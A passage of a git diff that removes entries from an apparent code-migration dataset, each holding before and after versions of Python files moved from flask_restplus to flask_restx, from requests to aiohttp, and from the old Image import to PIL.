List[Log]) -> List[ - DataIntegrationLogModel]: - - entities = [] - for log in logs: - result = DataIntegrationLogModel( - Id=log.Id, - JobId=log.JobId, - Type='Info' if log.TypeId == 2 else 'Error', - Content=log.Content, - LogDatetime=log.LogDatetime, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff deleted file mode 100644 index 4c29d32..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/operation/models/JobSchedulerModels.py b/src/api/controllers/operation/models/JobSchedulerModels.py - index 
4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/operation/models/JobSchedulerModels.py - +++ b/src/api/controllers/operation/models/JobSchedulerModels.py -@@ -2,7 +2,7 @@ import json - from datetime import datetime, timedelta - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from controllers.job.models.JobModels import JobModels diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py deleted file mode 100644 index 7de95ab..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.source.py +++ /dev/null @@ -1,91 +0,0 @@ -import json -from datetime import datetime, timedelta -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.job.models.JobModels import JobModels -from controllers.operation.models.DataOperationModels import DataOperationModels -from IocManager import IocManager -from models.dao.operation import DataOperationJob - - -class DataOperationJobModel(EntityModel): - def __init__(self, - Id: int = None, - StartDate: datetime = None, - EndDate: datetime = None, - Cron: str = None, - DataOperationId: int = None, - ApSchedulerJobId: int = None, - DataIntegration=None, - ApSchedulerJob=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.StartDate: datetime = StartDate - self.EndDate: datetime = EndDate - self.Cron: int = Cron - self.DataOperationId: int = DataOperationId - self.ApSchedulerJobId: int = ApSchedulerJobId - self.DataIntegration = DataIntegration - self.ApSchedulerJob = ApSchedulerJob - self.IsDeleted = IsDeleted - - -class JobSchedulerModels: - ns = IocManager.api.namespace('JobScheduler', description='Job Scheduler endpoints', - path='/api/JobScheduler') - - start_operation_model = IocManager.api.model('Schedule', { - 'OperationName': fields.String(description='Operation name', required=True), - 'RunDate': fields.DateTime( - description="Job run date.", required=True, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')) - }) - - start_operation_with_cron_model = IocManager.api.model('ScheduleDataOperation', { - 'OperationName': fields.String(description='Data Operation Name', required=True), - 'Cron': fields.String(description="Job cron value. ", required=True, example='*/1 * * * *'), - 'StartDate': fields.DateTime( - description="Job start date. The start date for the job can be entered if necessary.", required=False, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')), - 'EndDate': fields.DateTime( - description="Job End date. 
The end date for the job can be entered if necessary.", required=False, - example=(datetime.now() + timedelta(seconds=10)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'), - }) - delete_operation_job_model = IocManager.api.model('DeleteOperationJob', { - 'DataOperationJobId': fields.Integer(description='DataOperationJobId', required=True) - }) - delete_operation_cron_job_model = IocManager.api.model('DeleteOperationCronJob', { - 'DataOperationName': fields.String(description='Data Operation Name', required=True) - }) - - @staticmethod - def get_data_operation_job_model(data_operation_job: DataOperationJob) -> DataOperationJobModel: - entity_model = DataOperationJobModel( - Id=data_operation_job.Id, - Cron=data_operation_job.Cron, - StartDate=data_operation_job.StartDate, - EndDate=data_operation_job.EndDate, - DataOperationId=data_operation_job.DataOperationId, - ApSchedulerJobId=data_operation_job.ApSchedulerJobId, - IsDeleted=data_operation_job.IsDeleted, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['DataOperation'] = DataOperationModels.get_data_operation_result_model( - data_operation_job.DataOperation) - result_model['ApSchedulerJob'] = JobModels.get_ap_scheduler_job_model( - data_operation_job.ApSchedulerJob) - return result_model - - @staticmethod - def get_data_operation_job_models(data_operation_jobs: List[DataOperationJob]) -> List[ - DataOperationJobModel]: - entities = [] - for data_operation_job in data_operation_jobs: - entity = JobSchedulerModels.get_data_operation_job_model(data_operation_jobs) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py deleted file mode 100644 index c1ee4f5..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$JobSchedulerModels.py.target.py +++ /dev/null @@ -1,91 +0,0 @@ -import json -from datetime import datetime, timedelta -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.job.models.JobModels import JobModels -from controllers.operation.models.DataOperationModels import DataOperationModels -from IocManager import IocManager -from models.dao.operation import DataOperationJob - - -class DataOperationJobModel(EntityModel): - def __init__(self, - Id: int = None, - StartDate: datetime = None, - EndDate: datetime = None, - Cron: str = None, - DataOperationId: int = None, - ApSchedulerJobId: int = None, - DataIntegration=None, - ApSchedulerJob=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.StartDate: datetime = StartDate - self.EndDate: datetime = EndDate - self.Cron: int = Cron - self.DataOperationId: int = DataOperationId - self.ApSchedulerJobId: int = ApSchedulerJobId - self.DataIntegration = DataIntegration - self.ApSchedulerJob = ApSchedulerJob - self.IsDeleted = IsDeleted - - -class JobSchedulerModels: - ns = IocManager.api.namespace('JobScheduler', description='Job Scheduler endpoints', - path='/api/JobScheduler') - - start_operation_model = IocManager.api.model('Schedule', { - 'OperationName': fields.String(description='Operation name', required=True), - 'RunDate': 
fields.DateTime( - description="Job run date.", required=True, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')) - }) - - start_operation_with_cron_model = IocManager.api.model('ScheduleDataOperation', { - 'OperationName': fields.String(description='Data Operation Name', required=True), - 'Cron': fields.String(description="Job cron value. ", required=True, example='*/1 * * * *'), - 'StartDate': fields.DateTime( - description="Job start date. The start date for the job can be entered if necessary.", required=False, - example=(datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z')), - 'EndDate': fields.DateTime( - description="Job End date. The end date for the job can be entered if necessary.", required=False, - example=(datetime.now() + timedelta(seconds=10)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'), - }) - delete_operation_job_model = IocManager.api.model('DeleteOperationJob', { - 'DataOperationJobId': fields.Integer(description='DataOperationJobId', required=True) - }) - delete_operation_cron_job_model = IocManager.api.model('DeleteOperationCronJob', { - 'DataOperationName': fields.String(description='Data Operation Name', required=True) - }) - - @staticmethod - def get_data_operation_job_model(data_operation_job: DataOperationJob) -> DataOperationJobModel: - entity_model = DataOperationJobModel( - Id=data_operation_job.Id, - Cron=data_operation_job.Cron, - StartDate=data_operation_job.StartDate, - EndDate=data_operation_job.EndDate, - DataOperationId=data_operation_job.DataOperationId, - ApSchedulerJobId=data_operation_job.ApSchedulerJobId, - IsDeleted=data_operation_job.IsDeleted, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['DataOperation'] = DataOperationModels.get_data_operation_result_model( - data_operation_job.DataOperation) - result_model['ApSchedulerJob'] = JobModels.get_ap_scheduler_job_model( - data_operation_job.ApSchedulerJob) - return result_model - - @staticmethod - def get_data_operation_job_models(data_operation_jobs: List[DataOperationJob]) -> List[ - DataOperationJobModel]: - entities = [] - for data_operation_job in data_operation_jobs: - entity = JobSchedulerModels.get_data_operation_job_model(data_operation_jobs) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff deleted file mode 100644 index 2885bdd..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.diff +++ /dev/null @@ -1,10 +0,0 @@ -diff --git a/src/api/infrastructor/api/ResourceBase.py b/src/api/infrastructor/api/ResourceBase.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/infrastructor/api/ResourceBase.py - +++ b/src/api/infrastructor/api/ResourceBase.py -@@ -1,4 +1,4 @@ --from flask_restplus import Resource -+from flask_restx import Resource - - - class ResourceBase(Resource): diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py deleted file mode 100644 index 0dcbb3f..0000000 --- 
a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.source.py +++ /dev/null @@ -1,5 +0,0 @@ -from flask_restplus import Resource - - -class ResourceBase(Resource): - pass diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py deleted file mode 100644 index 0c1af92..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$infrastructor$api$ResourceBase.py.target.py +++ /dev/null @@ -1,5 +0,0 @@ -from flask_restx import Resource - - -class ResourceBase(Resource): - pass diff --git a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff b/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff deleted file mode 100644 index b175978..0000000 --- a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.diff +++ /dev/null @@ -1,89 +0,0 @@ -diff --git a/musicbot/linkutils.py b/musicbot/linkutils.py - index 7f240327378e1aab157aed6ee9185674c15926ad..1d8923abae93915ad877774e0fdc812d6c53a70b 100644 - --- a/musicbot/linkutils.py - +++ b/musicbot/linkutils.py -@@ -1,4 +1,4 @@ --import requests -+import aiohttp - import re - from bs4 import BeautifulSoup - from enum import Enum -@@ -15,6 +15,9 @@ try: - except: - api = False - -+url_regex = re.compile( -+ "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") -+ - - def clean_sclink(track): - if track.startswith("https://m."): -@@ -24,16 +27,17 @@ def clean_sclink(track): - return track - - --def convert_spotify(url): -- regex = re.compile( -- "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") -+async def convert_spotify(url): - -- if re.search(regex, url): -- result = regex.search(url) -+ if re.search(url_regex, url): -+ result = url_regex.search(url) - url = result.group(0) - -- page = requests.get(url) -- soup = BeautifulSoup(page.content, 'html.parser') -+ async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: -+ async with session.get(url) as response: -+ page = await response.text() -+ -+ soup = BeautifulSoup(page, 'html.parser') - - title = soup.find('title') - title = title.string -@@ -42,7 +46,7 @@ def convert_spotify(url): - return title - - --def get_spotify_playlist(url): -+async def get_spotify_playlist(url): - """Return Spotify_Playlist class""" - - code = url.split('/')[4].split('?')[0] -@@ -92,11 +96,12 @@ def get_spotify_playlist(url): - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - -- headers = { -- "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"} - -- page = requests.get(url, headers=headers) -- soup = BeautifulSoup(page.content, 'html.parser') -+ async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: -+ async with session.get(url) as response: -+ page = await response.text() -+ -+ soup = BeautifulSoup(page, 'html.parser') - - results = soup.find_all(property="music:song", attrs={"content": True}) - -@@ -157,7 +162,7 @@ def identify_url(url): - if "https://open.spotify.com/track" in url: - return Sites.Spotify - -- if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in 
url: -+ if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Sites.Spotify_Playlist - - if "bandcamp.com/track/" in url: -@@ -183,7 +188,7 @@ def identify_playlist(url): - if "playlist?list=" in url: - return Playlist_Types.YouTube_Playlist - -- if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in url: -+ if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Playlist_Types.Spotify_Playlist - - if "bandcamp.com/album/" in url: diff --git a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py b/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py deleted file mode 100644 index 96c3744..0000000 --- a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.source.py +++ /dev/null @@ -1,192 +0,0 @@ -import requests -import re -from bs4 import BeautifulSoup -from enum import Enum -from config import config - -import spotipy -from spotipy.oauth2 import SpotifyClientCredentials - - -try: - sp_api = spotipy.Spotify(auth_manager=SpotifyClientCredentials( - client_id=config.SPOTIFY_ID, client_secret=config.SPOTIFY_SECRET)) - api = True -except: - api = False - - -def clean_sclink(track): - if track.startswith("https://m."): - track = track.replace("https://m.", "https://") - if track.startswith("http://m."): - track = track.replace("http://m.", "https://") - return track - - -def convert_spotify(url): - regex = re.compile( - "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - if re.search(regex, url): - result = regex.search(url) - url = result.group(0) - - page = requests.get(url) - soup = BeautifulSoup(page.content, 'html.parser') - - title = soup.find('title') - title = title.string - title = title.replace(', a song by', '').replace(' on Spotify', '') - - return title - - -def get_spotify_playlist(url): - """Return Spotify_Playlist class""" - - code = url.split('/')[4].split('?')[0] - - if api == True: - - if "open.spotify.com/album" in url: - try: - results = sp_api.album_tracks(code) - tracks = results['items'] - - while results['next']: - results = sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append(track['external_urls']['spotify']) - except: - pass - return links - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - if "open.spotify.com/playlist" in url: - try: - results = sp_api.playlist_items(code) - tracks = results['items'] - while results['next']: - results = sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append( - track['track']['external_urls']['spotify']) - except: - pass - return links - - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - headers = { - "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"} - - page = requests.get(url, headers=headers) - soup = BeautifulSoup(page.content, 'html.parser') - - results = soup.find_all(property="music:song", attrs={"content": True}) - - links = [] - - for item in results: - links.append(item['content']) - - title = soup.find('title') - title = title.string - - return links - - -def get_url(content): - - regex = re.compile( - 
"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - if re.search(regex, content): - result = regex.search(content) - url = result.group(0) - return url - else: - return None - - -class Sites(Enum): - Spotify = "Spotify" - Spotify_Playlist = "Spotify Playlist" - YouTube = "YouTube" - Twitter = "Twitter" - SoundCloud = "SoundCloud" - Bandcamp = "Bandcamp" - Custom = "Custom" - Unknown = "Unknown" - - -class Playlist_Types(Enum): - Spotify_Playlist = "Spotify Playlist" - YouTube_Playlist = "YouTube Playlist" - BandCamp_Playlist = "BandCamp Playlist" - Unknown = "Unknown" - - -class Origins(Enum): - Default = "Default" - Playlist = "Playlist" - - -def identify_url(url): - if url is None: - return Sites.Unknown - - if "https://www.youtu" in url or "https://youtu.be" in url: - return Sites.YouTube - - if "https://open.spotify.com/track" in url: - return Sites.Spotify - - if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in url: - return Sites.Spotify_Playlist - - if "bandcamp.com/track/" in url: - return Sites.Bandcamp - - if "https://twitter.com/" in url: - return Sites.Twitter - - if url.lower().endswith(config.SUPPORTED_EXTENSIONS): - return Sites.Custom - - if "soundcloud.com/" in url: - return Sites.SoundCloud - - # If no match - return Sites.Unknown - - -def identify_playlist(url): - if url is None: - return Sites.Unknown - - if "playlist?list=" in url: - return Playlist_Types.YouTube_Playlist - - if "https://open.spotify.com/playlist"in url or "https://open.spotify.com/album" in url: - return Playlist_Types.Spotify_Playlist - - if "bandcamp.com/album/" in url: - return Playlist_Types.BandCamp_Playlist - - return Playlist_Types.Unknown diff --git a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py b/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py deleted file mode 100644 index f5731fd..0000000 --- a/v1/data/codefile/raptor123471@dingolingo__1d8923a__musicbot$linkutils.py.target.py +++ /dev/null @@ -1,197 +0,0 @@ -import aiohttp -import re -from bs4 import BeautifulSoup -from enum import Enum -from config import config - -import spotipy -from spotipy.oauth2 import SpotifyClientCredentials - - -try: - sp_api = spotipy.Spotify(auth_manager=SpotifyClientCredentials( - client_id=config.SPOTIFY_ID, client_secret=config.SPOTIFY_SECRET)) - api = True -except: - api = False - -url_regex = re.compile( - "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - -def clean_sclink(track): - if track.startswith("https://m."): - track = track.replace("https://m.", "https://") - if track.startswith("http://m."): - track = track.replace("http://m.", "https://") - return track - - -async def convert_spotify(url): - - if re.search(url_regex, url): - result = url_regex.search(url) - url = result.group(0) - - async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: - async with session.get(url) as response: - page = await response.text() - - soup = BeautifulSoup(page, 'html.parser') - - title = soup.find('title') - title = title.string - title = title.replace(', a song by', '').replace(' on Spotify', '') - - return title - - -async def get_spotify_playlist(url): - """Return Spotify_Playlist class""" - - code = url.split('/')[4].split('?')[0] - - if api == True: - - if "open.spotify.com/album" in url: - try: - results = sp_api.album_tracks(code) - tracks = results['items'] - - while results['next']: - results = 
sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append(track['external_urls']['spotify']) - except: - pass - return links - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - if "open.spotify.com/playlist" in url: - try: - results = sp_api.playlist_items(code) - tracks = results['items'] - while results['next']: - results = sp_api.next(results) - tracks.extend(results['items']) - - links = [] - - for track in tracks: - try: - links.append( - track['track']['external_urls']['spotify']) - except: - pass - return links - - except: - if config.SPOTIFY_ID != "" or config.SPOTIFY_SECRET != "": - print("ERROR: Check spotify CLIENT_ID and SECRET") - - - async with aiohttp.ClientSession(headers={'User-Agent': 'python-requests/2.20.0'}) as session: - async with session.get(url) as response: - page = await response.text() - - soup = BeautifulSoup(page, 'html.parser') - - results = soup.find_all(property="music:song", attrs={"content": True}) - - links = [] - - for item in results: - links.append(item['content']) - - title = soup.find('title') - title = title.string - - return links - - -def get_url(content): - - regex = re.compile( - "http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+") - - if re.search(regex, content): - result = regex.search(content) - url = result.group(0) - return url - else: - return None - - -class Sites(Enum): - Spotify = "Spotify" - Spotify_Playlist = "Spotify Playlist" - YouTube = "YouTube" - Twitter = "Twitter" - SoundCloud = "SoundCloud" - Bandcamp = "Bandcamp" - Custom = "Custom" - Unknown = "Unknown" - - -class Playlist_Types(Enum): - Spotify_Playlist = "Spotify Playlist" - YouTube_Playlist = "YouTube Playlist" - BandCamp_Playlist = "BandCamp Playlist" - Unknown = "Unknown" - - -class Origins(Enum): - Default = "Default" - Playlist = "Playlist" - - -def identify_url(url): - if url is None: - return Sites.Unknown - - if "https://www.youtu" in url or "https://youtu.be" in url: - return Sites.YouTube - - if "https://open.spotify.com/track" in url: - return Sites.Spotify - - if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Sites.Spotify_Playlist - - if "bandcamp.com/track/" in url: - return Sites.Bandcamp - - if "https://twitter.com/" in url: - return Sites.Twitter - - if url.lower().endswith(config.SUPPORTED_EXTENSIONS): - return Sites.Custom - - if "soundcloud.com/" in url: - return Sites.SoundCloud - - # If no match - return Sites.Unknown - - -def identify_playlist(url): - if url is None: - return Sites.Unknown - - if "playlist?list=" in url: - return Playlist_Types.YouTube_Playlist - - if "https://open.spotify.com/playlist" in url or "https://open.spotify.com/album" in url: - return Playlist_Types.Spotify_Playlist - - if "bandcamp.com/album/" in url: - return Playlist_Types.BandCamp_Playlist - - return Playlist_Types.Unknown diff --git a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff b/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff deleted file mode 100644 index dd8bcf8..0000000 --- a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/observatory/dashboard/models/Screenshot.py b/observatory/dashboard/models/Screenshot.py - index 
9aa7fe2d1b18a8df9d38a53986e19229a817bcb6..f970b543dc349460492a32a11731738062bfcc09 100644 - --- a/observatory/dashboard/models/Screenshot.py - +++ b/observatory/dashboard/models/Screenshot.py -@@ -12,7 +12,7 @@ - # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF - # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - --import Image -+from PIL import Image - import os - from django.db import models - from settings import SCREENSHOT_URL, SCREENSHOT_PATH diff --git a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py b/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py deleted file mode 100644 index ba35333..0000000 --- a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.source.py +++ /dev/null @@ -1,118 +0,0 @@ -# Copyright (c) 2010, individual contributors (see AUTHORS file) -# -# Permission to use, copy, modify, and/or distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - -import Image -import os -from django.db import models -from settings import SCREENSHOT_URL, SCREENSHOT_PATH -from Project import Project - -SCREENSHOT_WIDTH = 230.0 -SCREENSHOT_HEIGHT = 170.0 - -MAIN_PAGE_WIDTH = 605.0 -MAIN_PAGE_HEIGHT = 300.0 - -# a screenshot for a project, display on its page. its filename is derived from -# its ID, so it is not required as a field -class Screenshot(models.Model): - class Meta: - app_label = 'dashboard' - - # the title of the screenshot - title = models.CharField(max_length = 32) - - # a short description of the screenshot - description = models.CharField(max_length = 100) - - # what project is this a screenshot of? - project = models.ForeignKey(Project) - - # file extension - extension = models.CharField(max_length = 8) - - # save override to validate title/description length - def save(self, *args, **kwargs): - self.title = self.title[0:32] - self.description = self.description[0:100] - super(Screenshot, self).save(*args, **kwargs) - - # the filename for this file. just the last part, no directory specified. - def filename(self): - return "{0}{1}".format(str(self.id), self.extension) - - # the thumbnail filename for this file, no directory specified. 
- def thumbnail(self): - return str(self.id) + "_t.png" - - # the url of a screenshot - def url(self): - return os.path.join(SCREENSHOT_URL, self.filename()) - - # the thumbnail url of a screenshot - def thumb_url(self): - return os.path.join(SCREENSHOT_URL, self.thumbnail()) - - # the large thumbnail to be used on the main page - def main_page_url(self): - return os.path.join(SCREENSHOT_URL, str(self.id) + "_mp.png") - - # a static creation method to handle writing to disk - @staticmethod - def create(form, file, project): - # create a screenshot object in the database - screen = Screenshot(title = form.cleaned_data["title"], - description = form.cleaned_data["description"], - project = project, - extension = os.path.splitext(file.name)[1]) - screen.save() - - # write the screenshot to a file - path = os.path.join(SCREENSHOT_PATH, screen.filename()) - write = open(path, 'wb+') - - # write the chunks - for chunk in file.chunks(): - write.write(chunk) - write.close() - - def create_thumbnail(path, save, width, height): - # create a thumbnail of the file - img = Image.open(path) - - # resize the image for a thumbnail - scalex = width / img.size[0] - scaley = height / img.size[1] - scale = scalex if scalex > scaley else scaley - img = img.resize((int(img.size[0] * scale), - int(img.size[1] * scale)), - Image.ANTIALIAS) - - # crop the image to fit - if img.size[0] > width or img.size[1] > height: - left = (img.size[0] - width) / 2 - right = left + width - top = (img.size[1] - height) / 2 - bottom = top + height - img = img.crop((int(left), int(top), int(right), int(bottom))) - - # save the thumbnail - save_path = os.path.join(SCREENSHOT_PATH, save.format(str(screen.id))) - img.save(save_path, "PNG") - - create_thumbnail(path, "{0}_t.png", SCREENSHOT_WIDTH, SCREENSHOT_HEIGHT) - create_thumbnail(path, "{0}_mp.png", MAIN_PAGE_WIDTH, MAIN_PAGE_HEIGHT) - - return screen - diff --git a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py b/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py deleted file mode 100644 index 3cd2606..0000000 --- a/v1/data/codefile/rcos@observatory-retired__f970b54__observatory$dashboard$models$Screenshot.py.target.py +++ /dev/null @@ -1,118 +0,0 @@ -# Copyright (c) 2010, individual contributors (see AUTHORS file) -# -# Permission to use, copy, modify, and/or distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - -from PIL import Image -import os -from django.db import models -from settings import SCREENSHOT_URL, SCREENSHOT_PATH -from Project import Project - -SCREENSHOT_WIDTH = 230.0 -SCREENSHOT_HEIGHT = 170.0 - -MAIN_PAGE_WIDTH = 605.0 -MAIN_PAGE_HEIGHT = 300.0 - -# a screenshot for a project, display on its page. 
its filename is derived from -# its ID, so it is not required as a field -class Screenshot(models.Model): - class Meta: - app_label = 'dashboard' - - # the title of the screenshot - title = models.CharField(max_length = 32) - - # a short description of the screenshot - description = models.CharField(max_length = 100) - - # what project is this a screenshot of? - project = models.ForeignKey(Project) - - # file extension - extension = models.CharField(max_length = 8) - - # save override to validate title/description length - def save(self, *args, **kwargs): - self.title = self.title[0:32] - self.description = self.description[0:100] - super(Screenshot, self).save(*args, **kwargs) - - # the filename for this file. just the last part, no directory specified. - def filename(self): - return "{0}{1}".format(str(self.id), self.extension) - - # the thumbnail filename for this file, no directory specified. - def thumbnail(self): - return str(self.id) + "_t.png" - - # the url of a screenshot - def url(self): - return os.path.join(SCREENSHOT_URL, self.filename()) - - # the thumbnail url of a screenshot - def thumb_url(self): - return os.path.join(SCREENSHOT_URL, self.thumbnail()) - - # the large thumbnail to be used on the main page - def main_page_url(self): - return os.path.join(SCREENSHOT_URL, str(self.id) + "_mp.png") - - # a static creation method to handle writing to disk - @staticmethod - def create(form, file, project): - # create a screenshot object in the database - screen = Screenshot(title = form.cleaned_data["title"], - description = form.cleaned_data["description"], - project = project, - extension = os.path.splitext(file.name)[1]) - screen.save() - - # write the screenshot to a file - path = os.path.join(SCREENSHOT_PATH, screen.filename()) - write = open(path, 'wb+') - - # write the chunks - for chunk in 